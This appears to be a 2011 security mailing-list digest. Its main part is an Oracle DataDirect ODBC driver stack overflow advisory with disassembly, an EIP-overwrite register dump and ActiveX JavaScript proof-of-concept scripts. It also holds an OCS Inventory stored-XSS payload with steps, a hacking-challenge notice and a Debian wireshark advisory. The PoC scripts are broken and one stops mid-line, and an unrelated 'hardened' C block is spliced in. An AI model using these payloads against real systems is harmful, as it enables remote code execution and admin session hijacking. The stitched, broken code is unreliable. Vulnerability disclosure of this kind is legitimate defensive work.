profits; damages relating to the procurement of substitute products or
services; or damages for loss of data, or software restoration. The
information in this document is subject to change without notice.
Hewlett-Packard Company and the names of Hewlett-Packard products referenced
herein are trademarks of Hewlett-Packard Company in the United States and
other countries. Other product and company names mentioned herein may be
trademarks of their respective owners.
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability
Oracle DataDirect Multiple Native Wire Protocol ODBC Drivers HOST Attribute Stack Based Buffer Overflow Vulnerability tested against: Microsoft Windows 2k3 r2 sp2 Oracle Hyperion Performance Management and BI (v11.1.2.1.0) download url of the Oracle Hyperion suite: http://www.oracle.com/technetwork/middleware/epm/downloads/index.html files tested: SystemInstaller-11121-win32.zip FoundationServices-11121-win32-Part1.zip FoundationServices-11121-win32-Part2.zip FoundationServices-11121-win32-Part3.zip FoundationServices-11121-win32-Part4.zip FoundationServices-11121-Part5.zip FoundationServices-11121-Part6.zip FoundationServices-11121-Part7.zip StaticContent-11121.zip RandAFoundation-11121.zip EPM_Architect-11121.zip Vulnerability: The mentioned product installs various drivers to allow the software to get informations from ODBC data sources. Some of them are vulnerable to a remote stack based buffer overflow which can be triggered by specifying an overlong HOST attribute inside the connection string. The software tries to do an unicode/ASCII conversion. In doing this, the stack is completely smashed allowing to redirect the execution flow to an user supplied buffer. Analysis for (*) and errata corrige, too many nights awake : When receiveng the attribute, arsqls24.dll does an unicode/ASCII conversion; this fragment of code counts the number of bytes needed and store it in eax .. 01D45C10 83C1 02 add ecx,2 01D45C13 83C0 01 add eax,1 01D45C16 66:8339 00 cmp word ptr ds:[ecx],0 01D45C1A ^75 F4jnz short ARSQLS24.01D45C10 .. the next operation is a copy loop which moves the needed bytes to a memory region pointed by ecx, trusting the eax counter. .. 01D48C36 8A16 mov dl,byte ptr ds:[esi] 01D48C38 83E8 01 sub eax,1 01D48C3B 8811 mov byte ptr ds:[ecx],dl 01D48C3D 83C1 01 add ecx,1 01D48C40 83C6 02 add esi,2 01D48C43 85C0 test eax,eax 01D48C45 ^75 EFjnz short ARSQLS24.01D48C36 .. 
The memory region pointed to by ecx is adjacent to critical structures (stack pointers), so when the HOST attribute is an overlong string the stack is partially overwritten with user supplied values. The result, after a few steps:

    EAX
    ECX 0003
    EDX 02B52E88
    EBX 0013C720 ASCII AA
    ESP 0013C720 ASCII AA
    EBP 0013D1A4
    ESI 02B56FF8
    EDI 0001
    EIP 41414141
    C 0   ES 0023 32bit 0()
    P 1   CS 001B 32bit 0()
    A 0   SS 0023 32bit 0()
    Z 0   DS 0023 32bit 0()
    S 0   FS 003B 32bit 7FFDF000(FFF)
    T 0   GS NULL
    D 0
    O 0   LastErr WSAHOST_NOT_FOUND (2AF9)
    EFL 00010206 (NO,NB,NE,A,NS,PE,GE,G)
    MM0
    MM1
    MM2
    MM3
    MM4
    MM5
    MM6 8000
    MM7 FEE0

poc:
The underlying operating system contains the ADODB Connection ActiveX control which is marked safe for initialization and safe for scripting (implements the IObjectSafety interface), which could allow a remote attacker to specify the mentioned connection string. The IE security settings do not allow opening a connection from another domain, but this can be used in conjunction with an XSS vulnerability, connection string pollution or SQL injection vulnerabilities, or through specific configuration files. Note also that I am mentioning the ADODB object for pure commodity: when installed, the ODBC drivers are available systemwide, so this is a good basis for remote privilege elevations of many kinds. Note that Internet Explorer does not crash when trying to execute EIP; attach a tool like faultmon to the IE sub-process.
(*)

    <!-- saved from url=(0014)about:internet -->
    <script>
    var obj = new ActiveXObject("ADODB.Connection");
    x = "";
    for (i = 0; i < 666; i++) { x = x + }
    obj.ConnectionString = "DRIVER=DataDirect 6.0 SQL Server Native Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=xx;UID=sa;PWD=null;";
    obj.Open();
    </script>

    <!-- saved from url=(0014)about:internet -->
    <script>
    var obj = new ActiveXObject("ADODB.Connection");
    x = "";
    for (i = 0; i < 1666; i++) { x = x + }
    obj.ConnectionString = "DRIVER=DataDirect 6.0 Greenplum Wire Protocol;HOST=" + x + ";IP=127.0.0.1;PORT=9;DB=DB2DATA;UID=sa;PWD=null;";
    obj.Open();
    </script>

    <!-- saved from url=(0014)about:internet -->
    <script>
    var obj = new ActiveXObject("ADODB.Connection");
    x = "";
    for (i = 0; i < 1666; i++) { x = x + }
    obj.ConnectionString = "DRIVER=DataDirect 6.0 Informix Wire Protocol;HOST=" + x +
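A rewrite of the two loops quoted in the analysis above (count the UTF-16 HOST value, then copy its low bytes into a narrow buffer) with the bound that the quoted arsqls24.dll code lacks. This is an added illustration, not the driver's code; the function names and the 64-byte destination are assumptions.

```c
/* Added example, not from the advisory: the count-then-copy conversion of a
 * UTF-16 HOST attribute, written with an explicit destination bound.
 * Names and buffer sizes are hypothetical. */
#include <stddef.h>
#include <stdint.h>

/* Mirrors the first loop: walk the UTF-16 string two bytes at a time until the
 * zero terminator and count code units (the value the driver kept in eax). */
static size_t utf16_len(const uint16_t *s)
{
    size_t n = 0;
    while (s[n] != 0)
        n++;
    return n;
}

/* Hardened equivalent of the second loop. The original trusts the eax counter
 * and writes every low byte into a fixed stack region; here the copy is capped
 * by dst_size and an overlong attribute is refused rather than truncated,
 * since a silently shortened host name is itself a surprising result.
 * Returns the number of characters written, or -1 on refusal. */
static int utf16_to_ascii_bounded(const uint16_t *src, char *dst, size_t dst_size)
{
    size_t n = utf16_len(src);
    if (dst_size == 0 || n >= dst_size)
        return -1;                       /* would overflow: refuse */
    for (size_t i = 0; i < n; i++) {
        if (src[i] > 0x7F)               /* the driver just dropped the high byte */
            return -1;                   /* non-ASCII host names are refused too */
        dst[i] = (char)src[i];
    }
    dst[n] = '\0';
    return (int)n;
}

/* Builds a constructed HOST value of `units` 'A' characters (the same filler
 * the register dump shows as 0x41) and reports 1 if it is accepted into a
 * 64-byte buffer, 0 if refused. A 666-character value, as in the PoC, is refused. */
static int host_fits(size_t units)
{
    uint16_t src[2048];
    char dst[64];
    if (units >= sizeof src / sizeof src[0])
        return 0;
    for (size_t i = 0; i < units; i++)
        src[i] = 'A';
    src[units] = 0;
    return utf16_to_ascii_bounded(src, dst, sizeof dst) >= 0;
}
```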
OCS Inventory NG 2.0.1 Persistent XSS (CVE-2011-4024)
Software : Open Computer and Software (OCS) Inventory NG
Download : http://www.ocsinventory-ng.org/
Discovered by : Nicolas DEROUET (nicolas.derouet[gmail]com)
Discover : 2011-10-04
Published : 2011-10-05
Version : 2.0.1 and prior
Impact : Persistent XSS
Remote : Yes (No authentication is needed)
CVE-ID : CVE-2011-4024

Info
Open Computer and Software (OCS) Inventory Next Generation (NG) is an application designed to help a network or system administrator keep track of the computers' configuration and the software that is installed on the network.

Details
The vulnerability is in the data sent by the OCS agent. The inventory service and the admin panel do not control the data received. An attacker could inject malicious HTML/JS into the inventory information (eg. the computer description field under WinXP). This data is printed in the admin panel, which can lead to a session hijack or whatever you want.

PoC
1. Enter the XSS script (eg. <script>alert(String.fromCharCode(88,83,83))</script>) in the computer description field. (WinXP System Properties > Computer Name > Computer Description)
2. Launch an inventory with OCS Agent
3. Go to the admin panel (http://SERVER/ocsreports/)
4. View your computer detail

Tested on : OCS Agent 2.0.1 (WinXP SP3) and OCS Server 2.0.1 (Windows).
Not tested on : Linux platform and GLPI (OCS import)

Solution
Upgrade to OCS Inventory NG 2.0.2
GotRoot Security Challenge
Hi all,

We are proud to present a new free hacking challenge! It's all about getting root on a linux host! This time, we will provide a target host which you will access with ssh, and the goal is to disclose the /root/secret.txt file. Increase your knowledge about restricted environments and bypassing them; enjoy this free event!

Interested? Please sign up for a Hacking-Lab account and register yourself (free) to the Hacking Challenge classroom.
* https://www.hacking-lab.com/events/

Direct registration URL
* https://www.hacking-lab.com/events/registerform.html?eventid=199

Other Challenges
* There are other challenges available in the same classroom
* Web Security challenges and more ..

Regards
Ivan Buetler / E1
Compass Security, Switzerland
[SECURITY] [DSA 2324-1] wireshark security update
Debian Security Advisory DSA-2324-1                   secur...@debian.org
http://www.debian.org/security/                       Moritz Muehlenhoff
October 20, 2011                       http://www.debian.org/security/faq

Package        : wireshark
Vulnerability  : programming error
Problem type   : remote
Debian-specific: no
CVE ID         : CVE-2011-3360

The Microsoft Vulnerability Research group discovered that insecure load path handling could lead to execution of arbitrary Lua script code.

For the oldstable distribution (lenny), this problem has been fixed in version 1.0.2-3+lenny15. This build will be released shortly.

For the stable distribution (squeeze), this problem has been fixed in version 1.2.11-6+squeeze4.

For the unstable distribution (sid), this problem has been fixed in version 1.6.2-1.

We recommend that you upgrade your wireshark packages.

Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org